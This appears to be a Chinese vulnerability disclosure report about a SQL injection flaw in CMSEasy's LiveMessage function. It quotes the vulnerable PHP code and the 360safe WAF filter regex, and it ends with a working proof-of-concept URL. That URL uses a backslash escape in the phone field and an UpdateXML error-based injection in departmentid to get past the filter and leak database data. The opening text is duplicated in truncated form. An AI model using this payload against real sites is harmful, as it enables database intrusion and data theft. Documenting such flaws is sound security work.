### 简要描述: 继续绕啊绕啊 ### 详细说明: cmseasy 终于更新了 看了下对比文件,那修复~~~无法吐槽~~~~ ``` function LiveMessage($a) { global $db; $sessionid = $_SESSION['sessionid']; $name = addslashes(htmlspecialchars($a['name'])); $email = addslashes(htmlspecialchars($a['email'])); $country = htmlspecialchars($a['country']); $phone = htmlspecialchars($a['phone']); $departmentid = htmlspecialchars($a['departmentid']); $message = htmlspecialchars($a['message']); $timestamp = time(); $ip = $_SERVER['REMOTE_ADDR']; $sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')"; $db->query($sql); $sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'"; $db->query($sql); $text = "<?php echo $lang[shout_success]?>\n"; $objResponse = new xajaxResponse('utf-8'); $objResponse->addAssign('content', 'innerHTML',...
### 简要描述: 继续绕啊绕啊 ### 详细说明: cmseasy 终于更新了 看了下对比文件,那修复~~~无法吐槽~~~~ ``` function LiveMessage($a) { global $db; $sessionid = $_SESSION['sessionid']; $name = addslashes(htmlspecialchars($a['name'])); $email = addslashes(htmlspecialchars($a['email'])); $country = htmlspecialchars($a['country']); $phone = htmlspecialchars($a['phone']); $departmentid = htmlspecialchars($a['departmentid']); $message = htmlspecialchars($a['message']); $timestamp = time(); $ip = $_SERVER['REMOTE_ADDR']; $sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')"; $db->query($sql); $sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'"; $db->query($sql); $text = "<?php echo $lang[shout_success]?>\n"; $objResponse = new xajaxResponse('utf-8'); $objResponse->addAssign('content', 'innerHTML', $text); $objResponse->redirect('../', 5); return $objResponse; } ``` $a是可以通过前端get或者post传入。 只修复了name和email,不修复下面几个变量 这是给我们留着漏洞挖么!!!!!!! 然后开始测试,擦 发现360safe被更新了,修复增加了检测单引号! 这不坑爹么,只要输入单引号全盘否定! ``` $getfilter = "\\<.+javascript:window\\[.{1}\\\\x|<.*=(&#\\d+?;?)+?>|<.*(data|src)=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\\()|<[a-z]+?\\b[^>]*?\\bon([a-z]{4,})\s*?=|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?|`.*?`)|UPDATE(\\(.+\\)|\\s+?.+?|`.*?`.*?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?|`.*?`.*?)FROM(\\(.+\\)|\\s+?.+?|`.*?`.*?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|\\/\\*.*?\\*\\/|'"; ``` 但是还可以用转义符,接下来就是开始绕啊绕啊: POC: http://192.168.152.160:8080/cmseasy/celive/live/header.php?xajax=LiveMessage&xajaxargs[0][phone]=\&xajaxargs[0][departmentid]=,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),6,7,8)%23 另外官网没测试成功,好像有安全狗 [<img src="https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png" alt="BaiduHi_2014-10-21_16-4-7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png" alt="BaiduHi_2014-10-21_16-4-7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png)
